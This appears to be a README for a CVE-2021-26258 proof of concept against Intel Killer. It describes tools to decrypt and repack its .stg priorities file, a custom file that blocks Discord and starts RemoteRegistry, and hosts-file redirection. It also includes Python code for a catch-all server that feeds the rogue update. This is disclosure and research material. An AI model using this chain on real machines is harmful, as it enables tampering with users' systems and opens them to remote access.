This repo contains tools and supplementary files for CVE-2021-26258 PoC. See the blogpost for details of the vuln.
List of files:
- rn.stg.original: original .stg file that comes with Intel Killer
- rn.xml.original: .xml file extracted from rn.stg.original by using rnstg-tool
- rn_custom.xml: custom .xml file that disables network access for Discord.exe and starts RemoteRegistry service
- rn_custom.stg: custom .stg file derived from rn_custom.xml by using rnstg-tool
- WebSrv.py: tiny web server written in Python3 for simulation of a person-in-the-middle attack. The server replies to every HTTP request, regardless of method or path, with the rn_custom.stg file located in the same directory as the server
- rnstg-tool: source files of the tool for packing and unpacking Killer storage files. The tool has two commands: the "unpack" command extracts the rn.xml stream of the .stg file passed as the first argument, decrypts it and stores the decrypted XML to the output file given as the second argument. Conversely, the "pack" command takes an XML file as the first argument, encrypts it and stores the encrypted content to the .stg file passed as the second argument. The resulting storage file can then be fed to Killer via its update mechanism. The tool is deliberately simplistic: it does not verify its input or output files, so do not confuse the commands or their arguments, or you may silently overwrite the wrong file!
To run the demo add the line "127.0.0.1 www.killernetworking.com" to the hosts file (C:\Windows\System32\drivers\etc\hosts on Windows), put rn_custom.stg in the same directory as WebSrv.py and run the script. Next, go to the Killer UI, navigate to the Settings tab and click the "Download Latest App Priorities" button; Killer will now fetch the custom storage file from the local server instead of the real site. For details of the environment setup and a video of the attack refer to the Demo section of the blogpost. Feel free to ask questions on Twitter
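The following is an added example of the kind of catch-all server the demo relies on; it is not the repository's WebSrv.py and not Intel's or the blog author's code. It assumes the payload is a file named rn_custom.stg next to the script and that, once www.killernetworking.com resolves to 127.0.0.1, the Killer client fetches its update over plain HTTP on port 80 (the default port below is an assumption). The SAMPLE_STG bytes are a constructed stand-in so the server can be exercised offline; a real storage file comes from rnstg-tool.

```python
"""Catch-all HTTP server for simulating the person-in-the-middle position.

Added example, not the repository's WebSrv.py. Every request, whatever the
method, path or query string, is answered with the same .stg file, so the
server also logs the request line and Host header: that is the quickest way to
confirm which URL the Killer client actually asks for.
"""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from urllib.request import urlopen

# Constructed stand-in for a real storage file (assumption: not a valid .stg).
SAMPLE_STG = b"\x00\x01KILLER-STG-SAMPLE" + bytes(range(32))


def write_sample(path="rn_custom_sample.stg"):
    """Write the constructed sample payload so the server can be tried offline."""
    p = Path(path)
    p.write_bytes(SAMPLE_STG)
    return p


class StgHandler(BaseHTTPRequestHandler):
    """Ignore method, path and query string: every request gets the payload."""

    def _serve(self, send_body=True):
        body = Path(self.server.payload_path).read_bytes()
        # Log what the client asked for; useful to confirm the update URL.
        self.log_message("%s %s Host=%s -> %d bytes", self.command, self.path,
                         self.headers.get("Host"), len(body))
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if send_body:
            self.wfile.write(body)

    def do_GET(self):
        self._serve()

    def do_HEAD(self):
        self._serve(send_body=False)

    def do_POST(self):
        # Drain any request body so the connection stays in sync, then reply.
        length = int(self.headers.get("Content-Length", 0))
        if length:
            self.rfile.read(length)
        self._serve()


def start_server(payload_path, host="127.0.0.1", port=80):
    """Serve payload_path in a background thread; port=0 picks a free port."""
    server = HTTPServer((host, port), StgHandler)
    server.payload_path = str(payload_path)
    server.thread = threading.Thread(target=server.serve_forever, daemon=True)
    server.thread.start()
    return server


def fetch(url):
    """Plain HTTP GET returning the body, to check the server from a client."""
    with urlopen(url, timeout=5) as resp:
        return resp.read()


if __name__ == "__main__":
    # Assumption: rn_custom.stg sits next to this script; port 80 needs admin rights.
    srv = start_server(Path(__file__).with_name("rn_custom.stg"))
    print(f"serving on http://{srv.server_address[0]}:{srv.server_port}/ (Ctrl-C to stop)")
    try:
        srv.thread.join()
    except KeyboardInterrupt:
        srv.shutdown()
```

Because the handler never looks at the path, it does not matter exactly which URL the client requests under www.killernetworking.com; the logged request line tells you afterwards. Binding port 80 requires an elevated prompt on Windows, and the hosts entry should be removed once the demo is done.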